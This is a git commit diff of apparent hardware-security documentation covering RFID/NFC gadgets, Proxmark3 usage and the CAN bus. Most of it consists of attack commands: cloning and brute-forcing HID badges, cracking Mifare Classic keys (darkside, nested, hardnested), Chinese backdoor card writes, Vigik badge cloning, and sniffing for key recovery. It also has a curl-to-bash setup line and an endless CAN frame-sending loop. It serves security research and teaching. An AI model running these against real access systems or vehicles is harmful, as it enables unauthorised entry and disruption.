RFID NFC - Mifare Pages

pull/25/head
Swissky 2024-07-31 19:18:40 +02:00
parent 026c16d0cf
commit 76ef76505e
14 changed files with 739 additions and 522 deletions

View File

@ -22,6 +22,7 @@
7. On the Flipper Zero, once booted, press down, and left until you are on the 'Browser' screen. Scroll down until you see the 'update' directory and click on it. 7. On the Flipper Zero, once booted, press down, and left until you are on the 'Browser' screen. Scroll down until you see the 'update' directory and click on it.
8. You should now see the contents you uploaded and an 'update' option. Hover over the 'update' option, click the center button on your Flipper, once again on the 'Run in App' option. 8. You should now see the contents you uploaded and an 'update' option. Hover over the 'update' option, click the center button on your Flipper, once again on the 'Run in App' option.
### Firmware Update - WebUpdater ### Firmware Update - WebUpdater
* [DarkFlippers/unleashed-firmware - Web Update](https://lab.flipper.net/?url=https://unleashedflip.com/fw_extra_apps/flipper-z-f7-update-unlshd-038e.tgz&channel=release-cfw&version=unlshd-038e) * [DarkFlippers/unleashed-firmware - Web Update](https://lab.flipper.net/?url=https://unleashedflip.com/fw_extra_apps/flipper-z-f7-update-unlshd-038e.tgz&channel=release-cfw&version=unlshd-038e)
@ -39,6 +40,7 @@
* [Flipper Zero: is this for you? Follow our 1st tests! - Penthertz](https://www.youtube.com/watch?v=W5YYObSBUno) * [Flipper Zero: is this for you? Follow our 1st tests! - Penthertz](https://www.youtube.com/watch?v=W5YYObSBUno)
* [Flipper Zero: french collection video on the Flipper Zero, tutorial and explain](https://www.youtube.com/playlist?list=PLq_UnUtYZ15eoAiElH4T2XEB29iwZSi5a) * [Flipper Zero: french collection video on the Flipper Zero, tutorial and explain](https://www.youtube.com/playlist?list=PLq_UnUtYZ15eoAiElH4T2XEB29iwZSi5a)
## Tutorials and Resources ## Tutorials and Resources
* [Flipper Zero Hacking 101 - pingywon](https://flipper.pingywon.com/flipper/) * [Flipper Zero Hacking 101 - pingywon](https://flipper.pingywon.com/flipper/)
@ -47,8 +49,8 @@
* [Unleashed Firmware - Update firmware](https://github.com/DarkFlippers/unleashed-firmware/blob/dev/documentation/HowToInstall.md) * [Unleashed Firmware - Update firmware](https://github.com/DarkFlippers/unleashed-firmware/blob/dev/documentation/HowToInstall.md)
## References ## References
* [The Ultimate Guide / CheatSheet to Flipper Zero - Ilias Mavropoulos - 17/01/2024](https://infosecwriteups.com/the-ultimate-guide-cheatsheet-to-flipper-zero-d4c42d79d32c) * [The Ultimate Guide / CheatSheet to Flipper Zero - Ilias Mavropoulos - 17/01/2024](https://infosecwriteups.com/the-ultimate-guide-cheatsheet-to-flipper-zero-d4c42d79d32c)
* [djsime1/Awesome FlipperZero - 🐬 A collection of awesome resources for the Flipper Zero device](https://github.com/djsime1/awesome-flipperzero) * [djsime1/Awesome FlipperZero - 🐬 A collection of awesome resources for the Flipper Zero device](https://github.com/djsime1/awesome-flipperzero)
* [Reading NFC cards - Flipper Docs](https://docs.flipper.net/nfc/read)

46
docs/gadgets/icopy-x.md Normal file
View File

@ -0,0 +1,46 @@
# iCopy-X
iCopy-X is a "super" automated handheld RFID copier based on Proxmark3. iCopy-X can read, crack, duplicate, sniff and simulate without the use of a PC.
* [iCopy-X-Community](https://github.com/iCopy-X-Community)
* [iCopy-X-Community/icopyx-upstream](https://github.com/iCopy-X-Community/icopyx-upstream) - Collecting elements provided by the manufacturer
* [iCopy-X-Community/icopyx-community-pm3](https://github.com/iCopy-X-Community/icopyx-community-pm3) - Scrap repo for various tests
* [iCopy-X-Community/icopyx-teardown](https://github.com/iCopy-X-Community/icopyx-teardown)
## Update
Latest firmware: `1.0.90 2022-08-16`
* [icopy-x.com/otasys](https://icopy-x.com/otasys/index.php)
**Step 1**: Enter the device S/N (found under the “About” menu) on the website and download the upgrade package to your PC.
**Step 2**: Connect the iCopy-X to your computer using the supplied USB TYPE C cable and delete any files that end in “.ipk” from the root directory.
**Step 3**: Copy the newly downloaded upgrade package to the root directory.
**Step 4**: Press "Ok" on the second page of the "About" menu on the iCopy-X to start the automatic upgrade.
**TIP**: Ensure that the serial number has been entered correctly before starting as this could cause the upgrade to fail.
## PC Mode
In PC-Mode, after connecting to the computer, open the client in the built-in U disk, you can directly use the Proxmark3 universal CMD to operate.
```ps1
COM Port (Check Device Manager, numbers only): 4
[=] Session log E:/CLIENT_X86/.proxmark3/logs/log_20240730.txt
[+] loaded from JSON file E:/CLIENT_X86/.proxmark3/preferences.json
[=] Using UART port /com4
[=] Communicating with PM3 over USB-CDC
[usb] pm3 -->
```
## References
* [iCopy-X - Kickstarter - iCopy-X: Handheld Smart RFID Multi-Tool - Nikola T. Lab](https://www.kickstarter.com/projects/nikola-lab/icopy-x-0)
* [icopy-x Official Website](https://icopy-x.com/)

View File

@ -12,4 +12,5 @@
## References ## References
* [Raspberry Pi As Poor Mans Hardware Hacking Tool - Arun-Magesh - December 14, 2018](https://payatu.com/using-rasberrypi-as-poor-mans-hardware-hacking-tool) * [Raspberry Pi As Poor Mans Hardware Hacking Tool - Arun-Magesh - December 14, 2018](https://payatu.com/using-rasberrypi-as-poor-mans-hardware-hacking-tool)
* [Hardware Hacking with a Raspberry Pi - Configuring the PiFex - voidstarsec - JULY 2024](https://voidstarsec.com/blog/pifex-config)

73
docs/protocols/can.md Normal file
View File

@ -0,0 +1,73 @@
# CAN Bus
The Controller Area Network (CAN) bus is a high-integrity serial communication protocol designed for real-time data exchange in embedded systems, particularly in automotive and industrial applications. It operates on a multi-master, message-oriented architecture, allowing multiple devices (nodes) to communicate on the same network without a central controller.
## Interact
```ps1
pip install python-can
pip install python-can-utils
```
```py
import can
bus = can.Bus()
while True:
msg = can.Message(3, data=[0 for _ in range(8)])
bus.send(msg)
```
* [Tbruno25/can-explorer](https://github.com/Tbruno25/can-explorer) - Visualize CAN Bus messages in real time
## UDS
> Unified Diagnostic Services (UDS) is a communication protocol used in automotive Electronic Control Units (ECUs) to enable diagnostics, firmware updates, routine testing and more.
### Implementation
* [pylessard/python-udsoncan](https://github.com/pylessard/python-udsoncan) - Python implementation of UDS (ISO-14229) standard.
* [driftregion/iso14229](https://github.com/driftregion/iso14229) - C implementation of ISO 14229 (UDS) server and client for embedded systems
### SID
| UDS SID (Request) | UDS SID (Response) | UDS Service | Details |
| ----------------- | --------------------- | ------------- | ------- |
| 0x10 | 0x50 | Diagnostic session control | Control which UDS services are available. |
| 0x11 | 0x51 | ECU Reset | It resets the ECU (includes hard reset, key off and soft reset) |
| 0x27 | 0x67 | Security access | It enables use of security critical services via authentication. |
| 0x28 | 0x68 | Communication control | This field turns send/receive of messages ON or OFF in the ECU. |
| 0x29 | 0x69 | Aunthentication | Enables more advanced authentication vs. 0x27 (PKI based exchange). |
| 0x3E | 0x7E | Tester present | Send a heartbeat message periodically to remain in existing session . |
| 0x83 | 0xC3 | Access timing parameters | View/Modify timing parameters used in client/server communication. |
| 0x84 | 0xC4 | Secured Data Transmission | Send encrypted data via ISO 15764 (extended data link security) |
| 0x85 | 0xC5 | Control DTC Settings | Enable/Disable detection of errors (e.g. used during diagnostics) |
| 0x86 | 0xC6 | Response On Event | Request that ECU processes a service request if an event happens |
| 0x87 | 0xC7 | Link Control | Set the baud rate for diagnostic access |
| 0x22 | 0x62 | Read Data by Identifier | Read data from targetted ECU - e.g. VIN, sensor data etc. |
| 0x23 | 0x63 | Read Data by Address | Read data from physical memory (e.g. to understand software behaviour) |
| 0x24 | 0x64 | Read Scaling Data By Identifier | Read information about how to scale data identifiers |
| 0x2A | 0x6A | Read Data by Identifier Periodic | Request ECU to broadcast sensor data at slow/medium/fast/stop rate |
| 0x2C | 0x6C | Dynamically Define Data Identifier | Define data parameter for use in 0x22 or 0x2A dynamically |
| 0x2E | 0x6E | Write Data By Identifier | Program specific variables determined by data parameters |
| 0x3D | 0x7D | Write Memory By address | Write information to the ECU's memory |
| 0x14 | 0x54 | Clear Diagnostic Information | Delete stored DTCs |
| 0x19 | 0x59 | Read DTC Information | Read stored DTCs as well as related information |
| 0x2F | 0x6F | Input Output Control By Identifier | Gain control over ECU analog/digital inputs/outputs |
| 0x31 | 0x71 | Routine Control | Initiate/stop routines (e.g. self testing, erasing of flash memory) |
| 0x34 | 0x74 | Request Download | Start request to add software/data to ECU (including location/size) |
| 0x35 | 0x75 | Request Upload | Start request to read software/data from ECU (including location/size) |
| 0x36 | 0x76 | Transfer Data | Perform actual transfer of data following use of 0x74/0x75 |
| 0x37 | 0x77 | Request Transfer Exit | Stop the transfer of data |
| 0x38 | 0x78 | Request File Transfer | Perform a file download/upload to/from the ECU |
| 0x7F | Negative Response | Send with a negative response code when a request can not be handled. |
## References
* [Awesome CAN bus tools, hardware and resources - iDoka](https://github.com/iDoka/awesome-canbus)
* [UDS SID Table | UDS SID Request And Response - rfwireless-world](https://www.rfwireless-world.com/Terminology/UDS-SID-Table.html)
* [UDS Explained - A Simple Intro (Unified Diagnostic Services) - csselectronics](https://www.csselectronics.com/pages/uds-protocol-tutorial-unified-diagnostic-services)
* [Unified Diagnostic Services (UDS) Explained - A Simple Intro [2022] - csselectronics](https://youtu.be/CV_B8tJgI5E)

View File

@ -1,518 +0,0 @@
# NFC - RFID
> Radio Frequency Identification (RFID) & Near Field Communication (NFC)
## Install and configuration
Dependencies to install first
```ps1
sudo apt-get install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib ncurses-dev libpcsclite-dev pcscd
```
Cloning and building the tool.
```powershell
git clone https://github.com/Proxmark/proxmark3.git
cd proxmark3
make clean && make all
dmesg | grep -i usb
~/proxmark3/client/proxmark3 /dev/ttyACM0
```
* Ubuntu : `curl https://raw.githubusercontent.com/daveio/attacksurface/master/proxmark3/pm3-setup.sh | bash`
* Kali : `Same script should work, just replace Ubuntu 14.04 by Kali`
Testing the tool with the commands `hw tune` and `hw version`.
```powershell
proxmark3> hw tune
Measuring antenna characteristics, please wait.........
# LF antenna: 73.70 V @ 125.00 kHz
# LF antenna: 59.12 V @ 134.00 kHz
# LF optimal: 73.97 V @ 126.32 kHz
# HF antenna: 29.32 V @ 13.56 MHz
proxmark3> hw version
Prox/RFID mark3 RFID instrument
uC: AT91SAM7S256 Rev D
Embedded Processor: ARM7TDMI
```
If the `ACR122` doesn't work properly, try `sudo rmmod pn533_usb`
### Update and flash
In order to update and flash your proxmark you have to kill the `ModemManager` process as it is interfering with the process.
```powershell
ps -aux | grep ModemManager
kill [pid] - on my system stable 521
```
By default the compilation makefile will target the Proxmark rdv4, to make a firmware and boot image for the Proxmark3 Easy you need to edit the `Makefile.platform` from `PLATFORM=PM3RDV4` to `PLATFORM=PM3OTHER`.
| PLATFORM | DESCRIPTION |
| ------------- | ------------------------ |
| PM3RDV4 (def) | Proxmark3 rdv4 |
| PM3OTHER | Proxmark3 generic target |
The compilation steps are as follows.
```powershell
make armsrc/obj/fullimage.elf bootrom/obj/bootrom.elf client/flasher
./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf armsrc/obj/fullimage.elf
```
## Notes about card types
* **MIFARE Classic 1K/4K**: basically just a memory storage device. This memory, either 1024 or 4096 bytes, is divided into sectors and blocks. Most of the time used for regular access badges and has really simple security mechanisms for access control
* **MIFARE Ultralight**: a 64 bytes version of MIFARE Classic. Its low costs make it widely used as disposable tickets for events or transportation.
* **MIFARE Plus**: announced as a replacement of MIFARE Classic. The Plus subfamily brings the new level of security up to 128-bit AES encryption.
* **MIFARE DESFire**: those tags come pre-programmed with a general purpose DESFire operating system which offers a simple directory structure and files, and are the type of MIFARE offering the highest security levels.
## LF - HID & Indala
> Cloning requires writable T55xx card. The T55x7 card can be configured to emulate many of the 125 kHz tags.
```powershell
lf search # HID Prox TAG ID: 2004263f88
lf hid fskdemod # (Push the button on the PM3 to stop scanning - not necessary)
lf hid demod # (Push the button on the PM3 to stop scanning - not necessary)
lf hid clone 2004263f88 # (id à cloner)
lf hid sim 200671012d # simulate HID card with UID=200671012d
lf indala read
lf indala demod
lf indala sim a0000000c2c436c1 # simulate Indala with UID=a0000000c2c436c1
lf indala clone a0000000c2c436c1 # clone Indala to T55x7 card
lf hitag info
lf hitag sim c378181c_a8f7.ht2 # simulate HiTag
```
## LF - EM410X
Read only memory :/
```powershell
Proxmark> lf em4x em410xread
EM410x Tag ID: 23004d4dee
Proxmark> lf em4x em410xsim 23004d4dee
```
## HID : Example - Card
### HID card format
```powershell
proxmark3> lf hid decode 10001fc656
--------------------------------------------------
Format: H10302 (HID H10302 37-bit huge ID)
Card Number: 1041195
Parity: Valid
--------------------------------------------------
Format: H10304 (HID H10304 37-bit)
Facility Code: 1
Card Number: 516907
Parity: Valid
--------------------------------------------------
```
### Write an HID card
```powershell
# version with facility code is better
proxmark3> lf hid encode H10304 f 49153 c 516907
HID Prox TAG ID: 1c001fc656
proxmark3> lf hid encode H10302 c 1041195
HID Prox TAG ID: 10001fc656
-------------------------------------------------
```
Example 2
```powershell
proxmark3> lf hid decode 1c0006bb43
--------------------------------------------------
Format: H10302 (HID H10302 37-bit huge ID)
Card Number: 220577
Parity: Valid
--------------------------------------------------
Format: H10304 (HID H10304 37-bit)
Facility Code: 49152
Card Number: 220577
Parity: Valid
--------------------------------------------------
proxmark3> lf hid encode H10302 c 220577
HID Prox TAG ID: 100006bb43
```
### Bruteforce an HID reader
```powershell
pm3 --> lf hid brute a 26 f 224
pm3 --> lf hid brute v a 26 f 21 c 200 d 2000
Options
---
a <format> : 26|33|34|35|37|40|44|84
f <facility-code> : 8-bit value HID facility code
c <cardnumber> : (optional) cardnumber to start with, max 65535
d <delay> : delay betweens attempts in ms. Default 1000ms
v : verbose logging, show all tries
```
## HF - Mifare DESFire
> No known attacks yet ! Unencrypted sectors can be read, also you can try to look for default keys. All MIFARE cards are prone to relay attack.
* Mifare DESFire [MF3ICD40](https://arstechnica.com/information-technology/2011/10/researchers-hack-crypto-on-rfid-smart-cards-used-for-keyless-entry-and-transit-pass/): uses Triple DES encryption, product discontinued.
```powershell
It requires the attacker to have the card itself, an RFID reader, and a radio probe.
Using differential power analysis, data is collected from radio frequency energy
that leaks out of the card (its “side channels”).
```
* Mifare DESFire EV1 : the challenge is done with AES or 3DES.
* Mifare DESFire EV2
## HF - Mifare Ultra Light
* Ultralight C (3DES authentication)
* Ultralight EV1
* NTAG2
### Chinese backdoor
```powershell
pm3 --> hf 14a raw -p -b 7 40
pm3 --> hf 14a raw -p 43
pm3 --> hf 14a raw -p -c a20059982120
0x40, init backdoor mode
0x41, wipe fills card with 0xFF
0x42, fills card with 0x00
0x43, no authentication needed. issue a 0x3000 to read block 0, or write block.
0x44, fills card with 0x55
```
### Simulate
```powershell
hf 14a sim 2 <7-byte tag>
```
## HF - Mifare Classic 1k
New method for Proxmark : `hf mf autopwn`
### Darkside attack (PRNG Weak)
**Proxmark method**
```powershell
pm3> hf search
pm3> hf mfu
pm3> hf mf darkside (fork command)
pm3> hf mf mifare (original command)
Parity is all zero. Most likely this card sends NACK on every failed authentication. # Card is empty...
or
Found valid key:ffffffffffff # KEY_FOUND
pm3> hf mf chk 0 A KEY_FOUND (Check Found Key On Block 0 A)
```
**ACR122u method**
```powershell
# start cracking the first key of the first sector.
mfcuk -C -R 0:A -v 3 -s 250 -S 250
mfcuk -C -R 3:A -v 3 -s 250 -S 250 -o mycard.mfc
```
### Nested attack (PRNG Weak)
> Need to find a default key to extract the others
**Proxmark method**
```powershell
hf search
hf mf chk 1 ? t # "Test Block Keys" command which will test the default keys for us
hf mf nested 1 0 A a0a1a2a3a4a5 t. # "Nested Attack" use the key a0a1a2a3a4a5, keeping the key in memory with "t"
hf mf chk * ? # "Test Block Keys" command which will test the default keys for us
hf mf nested 1 0 A ffffffffffff d # "Nested Attack" use the key ffffffffffff to extract the others (file:dumpkeys.bin)
hf mf dump 1 # Dump content
hf mf restore 1 # Restore content into the card
hf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa # write on block 5, with the key 0808... the content 3211...
hf mf rdbl 5 A 080808080808 # Read block 5 with the keu 0808..
python pm3_mfd2eml.py dumpdata.bin dumpdata.eml
pm3> hf mf cload dumpdata
```
**ACR122u method**
```powershell
nfc-list
mfoc -O card.mfd # dump the memory of the tag
# Le paramètre P permet de spécifier le nombre de sondes par secteur. Par défaut, ce nombre est à 20 mais nous pouvons le passer à 500.
mfoc -P 500 -O dump_first_try.dmp
nfc-mfclassic w a key.mfd data.mfd # write data
nfc-mfclassic W a key.mfd data.mfd # write data and sector 0
```
### Hardnested attack
> One key is needed in order to use this attack
For newest MIFARE Classic and MIFARE Plus SL1
**Proxmark method**
:warning: NOTE: These hardware changes resulted in the Proxmark 3 Easy being incapable of performing several of the Proxmark's advanced features, including the Mifare Hard-Nested attacks. In other word you need a real Proxmark, not a cheap chinese copy.
```powershell
# find a default key
# res column is either equal to 1 or 0.
# A 1 in the column means the key was valid for that sector.
hf mf chk *1 ? t
# <block number> <key A|B> <key (12 hex symbols)>
# <target block number> <target key A|B> [known target key (12 hex symbols)] [w] [s]
# w: Acquire nonces and write them to binary file nonces.bin
hf mf hardnested 0 A 8829da9daf76 4 A w
# then https://github.com/aczid/crypto1_bs
./solve_piwi 0xcafec0de.bin
./solve_piwi_bs 0xcafec0de.bin
```
**ACR122u method**
With the key n°A a0a1a2a3a4a5 for sector 0 and we want key n°A for sector 1. This method can be reused for every sectors.
```powershell
./libnfc_crypto1_crack a0a1a2a3a4a5 0 a 4 a
Found tag with uid 62ef9e5a, collecting nonces for key A of block 4 (sector 1) using known key A a0a1a2a3a4a5 for block 0 (sector 0)
Collected 2379 nonces... leftover complexity 23833993588 (~2^34.47) - initializing brute-force phase...
Starting 4 threads to test 23833993588 states using 256-way bitslicing
Cracking... 88.93%
Found key: c44e2b5e4ce3
Tested 21232975852 states
```
### Magic Chinese Card - Acronyms
**UID** - The original Chinese Magic Backdoor card. These cards respond to the backdoor commands and will show Chinese magic backdoor commands (GEN 1a) detected when you do an hf search. These cards can be detected by probing the card to see if it responds to the backdoor commands. Some RFID systems may try to detect these cards.
**CUID** - The 2nd generation Chinese Magic Backdoor card. These cards do not use the backdoor commands, but instead allow Block 0 to be written to like any other block on the card. This gives the card better compatibility to be written to from an Android phone. However, some RFID systems can detect this type of card by sending a write command to Block 0, making the card invalid after the first use is attempted.
**FUID** - This type of card is not as common, but allows Block 0 to be written to just once. This allows you to create a clone of a card and any checks done by the RFID system will pass because Block 0 is no longer writable.
**UFUID** - This type of card is apparently a "better" version of the FUID card. Instead of only allowing Block 0 to be written once, you can write to it many times and then lock the block later when you're happy with the result. After locking Block 0, it cannot be unlocked to my knowledge. I do not think there is currently a way to lock these cards using the Proxmark3.
### Magic Chinese Card - GEN 2
They can be copied directly. The software allows a new UID.
### Magic Chinese Card - GEN 1a
> **Works better on the official client.py instead of the iceman fork.**
Reset a UID Changeable Magic Card (7 bytes UID) :warning: You should prefer this method !
```powershell
proxmark3> hf mf csetuid 42917CAB 0004 08
uid:42 91 7c ab
--atqa:00 04 sak:08
Chinese magic backdoor commands (GEN 1a) detected
```
To set all the block `hf mf csetblk 0 42917CAB00080400022A2C87933EF21D`
NOTE: The UID from several cards can be computed with the displayed id, e.g: ID is 2910621770.
```python
import struct
struct.pack('<I',2910621770).encode('hex')
'4a907cad'
```
### Unbricking Chinese Magic Mifare Classic
If you set the wrong BCC for UID and can't read the card anymore, you can use some backdoor commands to change sector 0 using Proxmark:
```powershell
hf 14a raw -a -p -b 7 40
hf 14a raw -p 43
hf 14a raw -p -c a0 00
hf 14a raw -p -c de ad be ef 22 08 04 00 46 59 25 58 49 10 23 02
```
### Key Bruteforce/Dictionary attack
```powershell
hf mf chk *1 ? t # Default keys
hf mf chk *1 ? d default_keys.dic
hf mf chk 0 A default_keys.dic # Dictionary attack with file: default_keys.dic
```
### Write and read sectors
> Avoid writing wrbl 3 (contains key A/B + permissions)
```powershell
proxmark3> hf mf wrbl 1 a ffffffffffff 000102030405060708090a0b0c0d0e0f
proxmark3> hf mf wrbl 2 a ffffffffffff 464c4147313a4d31664072335f303037
```
```powershell
hf mf rdsc <sector number> <key A/B> <key (12 hex symbols)>
```
### Dump Mifare card
```powershell
proxmark3> hf mf dump 1 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin
<card memory>: 0 = 320 bytes (Mifare Mini), 1 = 1K (default), 2 = 2K, 4 = 4K
k <name> : key filename, if no <name> given, UID will be used as filename
f <name> : data filename, if no <name> given, UID will be used as filename
```
### Simulate and emulate Mifare card
Emulate from a dump file
```powershell
# convert .bin to .eml
proxmark3> script run dumptoemul -i dumpdata.bin
proxmark3> hf mf eload <file name w/o .eml>
```
Simulate Mifare 1K UID
```powershell
proxmark3> hf mf sim u 353c2aa6
```
### MITM attack
```powershell
hf 14a snoop
# read card
# push button
hf list 14a
089220 | 095108 | Tag | 4d xx xx xx d3 | | UID
114608 | 125072 | Rdr | 93 70 4d xx xx xx d3 4f 8d | ok | SELECT_UID
...
525076 | 529748 | Tag | 61 7a 66 18 | | TAG CHALLENGE
540608 | 549920 | Rdr |50! 87! 8e ab 3b! 49 5a 1b | !crc| HALT
551188 | 555860 | Tag |d6! 53! 7c 57! | | TAG RESPONSE
UID: 4dxxxxxxd3
TAG CHALLENGE: 617a6618
READER CHALLENGE: 50878eab
READER RESPONSE: 3b495a1b
TAG RESPONSE: d6537c57
# crapto1gui or mfkey
cd tools/mfkey
make
./mfkey64
./mfkey64 xxxxxxxx 3b45a45a 7ddb6646 142fc1b9 9195fb3f
```
### Reader only attack
Emulate a MIFARE Classic with a DEADBEEF UID.
```powershell
proxmark3> hf mf sim u deadbeef n 1 x
mf 1k sim uid: de ad be ef , numreads:0, flags:18 (0x12)
#db# Collected two pairs of AR/NR which can be used to extract keyA from reader for sector 1:
#db# ../tools/mfkey/mfkey32 deadbeef 0102xxxx 4d9axxxx 87e7xxxx 06d2xxxx b4a0xxxx
#db# Emulator stopped. Tracing: 1 trace length: 253
#db# 4B UID: deadbeef
```
### Read a Mifare Dump
```powershell
pip install bitstring
git clone https://github.com/zhovner/mfdread
mfdread.py ./dump.mfd
```
## HF - Mifare Classic 4k
### Chinese Magic Mifare Classic 4K
Block 0 is writable through normal Mifare Classic commands, i.e. there is not special “unlocked” read/write like in “magic Mifare 1k” version.
Writing block 0 with Proxmark, UID 01020304, using key A being FFFFFFFFFFFF:
```powershell
hf mf wrbl 0 a FFFFFFFFFFFF 01020304040000000000000000000000
```
Again, watch out to have correct BCC and avoid Cascading Tag (0x88) as first byte of UID, or you may make the card unselectable (i.e. brick it).
## HF - Vigik
Tool : https://github.com/cjbrigato/kigiv-for-proxmark3/releases
```powershell
modprobe -r pn533_usb
modprobe -r pn533
nfc-list # Vérifier le bon fonctionnement du lecteur
mfoc -P 500 -O carte-vierge.dmp # Extraire les clés de chiffrement de la puce RFID chinoise dans un fichier
mfoc -P 500 -O carte-originale.dmp # Copiez le contenu de la puce RFID dorigine dans un fichier
nfc-mfclassic W a carte-originale.dmp carte-vierge.dmp # Ecrire le contenu de la puce originale sur la puce chinoise
```
## Replay Attacks
Replay attack is a technique where a malicious user could implement a device to intercept a NFC transaction and redeem it later, using other device or even in different location.
## Relay Attack
The relay attack is a technique where a malicious user implements a man in the middle attack. The attacker(APDUer) is capable to intercept, manipulate and change the transaction in real time to take advantage of it.
[https://en.wikipedia.org/wiki/Relay_attack](https://en.wikipedia.org/wiki/Relay_attack)
* NFC Payment Relay Attacks - [intro-to-nfc-payment-relay-attacks/](https://salmg.net/2018/12/01/intro-to-nfc-payment-relay-attacks/)
* NFCopy85 is a 10 dollars device to make replay attacks against NFC payment systems - [nfcopy85](https://salmg.net/2019/06/16/nfcopy85/)
## References
* https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/
* https://aur.archlinux.org/packages/proxmark3/
* https://github.com/Proxmark/proxmark3/wiki/Kali-Linux
* https://github.com/Proxmark/proxmark3/wiki/Mifare-HowTo
* https://www.latelierdugeek.fr/2017/07/12/rfid-le-clone-parfait/
* https://github.com/cjbrigato/kigiv-for-proxmark3/releases
* http://guillaumeplayground.net/proxmark3-hardnested/
* https://www.ordinoscope.net/index.php/Electronique/Hardware/Divers/RFID/Proxmak3/Mf\_(Mifare)
* https://pi3rrot.net/wiki/doku.php?id=rfid:break\_mifare1k\_proxmark3
* https://connect.ed-diamond.com/MISC/MISCHS-016/Proxmark-3-le-couteau-suisse-RFID
* https://blandais.github.io/mifare/fr
* http://www.icedev.se/pm3docs.aspx
* http://www.icedev.se/pm3cmds.aspx
* https://scund00r.com/all/rfid/2018/06/05/proxmark-cheatsheet.html
* https://www.tinker.sh/badge-cloning-clone-hid-prox-with-proxmark3-rvd4/
* https://hackmethod.com/hacking-mifare-rfid/
* https://hackmethod.com/hacking-mifare-rfid-2/
* https://github.com/Proxmark/proxmark3/wiki/Mifare-Tag-Ops
* http://arishitz.net/coffee-nfc-exploit-coffee-again/
* https://thetraaaxx.org/writeup-irl-hacking-le-porte-monnaie-nfc-securise
* https://linuskarlsson.se/blog/acr122u-mfcuk-and-mfoc-cracking-mifare-classic-on-arch-linux/
* https://github.com/RfidResearchGroup/proxmark3/blob/master/doc/cheatsheet.md
* https://smartlockpicking.com/slides/Confidence\_A\_2018\_Practical\_Guide\_To\_Hacking\_RFID\_NFC.pdf

View File

@ -0,0 +1,101 @@
# LF - HID & Indala
## HID & Indala
> Cloning requires writable T55xx card. The T55x7 card can be configured to emulate many of the 125 kHz tags.
```powershell
lf search # HID Prox TAG ID: 2004263f88
lf hid fskdemod # (Push the button on the PM3 to stop scanning - not necessary)
lf hid demod # (Push the button on the PM3 to stop scanning - not necessary)
lf hid clone 2004263f88 # (id à cloner)
lf hid sim 200671012d # simulate HID card with UID=200671012d
lf indala read
lf indala demod
lf indala sim a0000000c2c436c1 # simulate Indala with UID=a0000000c2c436c1
lf indala clone a0000000c2c436c1 # clone Indala to T55x7 card
lf hitag info
lf hitag sim c378181c_a8f7.ht2 # simulate HiTag
```
## LF - EM410X
Read only memory :/
```powershell
Proxmark> lf em4x em410xread
EM410x Tag ID: 23004d4dee
Proxmark> lf em4x em410xsim 23004d4dee
```
## HID : Examples - Card
### HID card format
```powershell
proxmark3> lf hid decode 10001fc656
--------------------------------------------------
Format: H10302 (HID H10302 37-bit huge ID)
Card Number: 1041195
Parity: Valid
--------------------------------------------------
Format: H10304 (HID H10304 37-bit)
Facility Code: 1
Card Number: 516907
Parity: Valid
--------------------------------------------------
```
### Write to an HID card
```powershell
# version with facility code is better
proxmark3> lf hid encode H10304 f 49153 c 516907
HID Prox TAG ID: 1c001fc656
proxmark3> lf hid encode H10302 c 1041195
HID Prox TAG ID: 10001fc656
-------------------------------------------------
```
Example 2
```powershell
proxmark3> lf hid decode 1c0006bb43
--------------------------------------------------
Format: H10302 (HID H10302 37-bit huge ID)
Card Number: 220577
Parity: Valid
--------------------------------------------------
Format: H10304 (HID H10304 37-bit)
Facility Code: 49152
Card Number: 220577
Parity: Valid
--------------------------------------------------
proxmark3> lf hid encode H10302 c 220577
HID Prox TAG ID: 100006bb43
```
### Bruteforce an HID reader
```powershell
pm3 --> lf hid brute a 26 f 224
pm3 --> lf hid brute v a 26 f 21 c 200 d 2000
Options
---
a <format> : 26|33|34|35|37|40|44|84
f <facility-code> : 8-bit value HID facility code
c <cardnumber> : (optional) cardnumber to start with, max 65535
d <delay> : delay betweens attempts in ms. Default 1000ms
v : verbose logging, show all tries
```
## References
* [Proxmark 3, le couteau suisse RFID - Bourdin Pierre - octobre 2017](https://connect.ed-diamond.com/MISC/MISCHS-016/Proxmark-3-le-couteau-suisse-RFID)
* [Badge Cloning: Clone HID Prox with Proxmark3 RDV4 - Standalone Mode - Tinker - October 22, 2018](https://web.archive.org/web/20210725163656/https://www.tinker.sh/badge-cloning-clone-hid-prox-with-proxmark3-rvd4/)

View File

@ -0,0 +1,277 @@
# HF - Mifare Classic
## HF - Mifare Classic 1k
New method for Proxmark : `hf mf autopwn`
### Darkside attack (PRNG Weak)
**Proxmark method**
```powershell
pm3> hf search
pm3> hf mfu
pm3> hf mf darkside (fork command)
pm3> hf mf mifare (original command)
Parity is all zero. Most likely this card sends NACK on every failed authentication. # Card is empty...
or
Found valid key:ffffffffffff # KEY_FOUND
pm3> hf mf chk 0 A KEY_FOUND (Check Found Key On Block 0 A)
```
**ACR122u method**
```powershell
# start cracking the first key of the first sector.
mfcuk -C -R 0:A -v 3 -s 250 -S 250
mfcuk -C -R 3:A -v 3 -s 250 -S 250 -o mycard.mfc
```
### Nested attack (PRNG Weak)
> Need to find a default key to extract the others
**Proxmark method**
```powershell
hf search
hf mf chk 1 ? t # "Test Block Keys" command which will test the default keys for us
hf mf nested 1 0 A a0a1a2a3a4a5 t. # "Nested Attack" use the key a0a1a2a3a4a5, keeping the key in memory with "t"
hf mf chk * ? # "Test Block Keys" command which will test the default keys for us
hf mf nested 1 0 A ffffffffffff d # "Nested Attack" use the key ffffffffffff to extract the others (file:dumpkeys.bin)
hf mf dump 1 # Dump content
hf mf restore 1 # Restore content into the card
hf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa # write on block 5, with the key 0808... the content 3211...
hf mf rdbl 5 A 080808080808 # Read block 5 with the keu 0808..
python pm3_mfd2eml.py dumpdata.bin dumpdata.eml
pm3> hf mf cload dumpdata
```
**ACR122u method**
```powershell
nfc-list
mfoc -O card.mfd # dump the memory of the tag
# Le paramètre P permet de spécifier le nombre de sondes par secteur. Par défaut, ce nombre est à 20 mais nous pouvons le passer à 500.
mfoc -P 500 -O dump_first_try.dmp
nfc-mfclassic w a key.mfd data.mfd # write data
nfc-mfclassic W a key.mfd data.mfd # write data and sector 0
```
### Hardnested attack
> One key is needed in order to use this attack
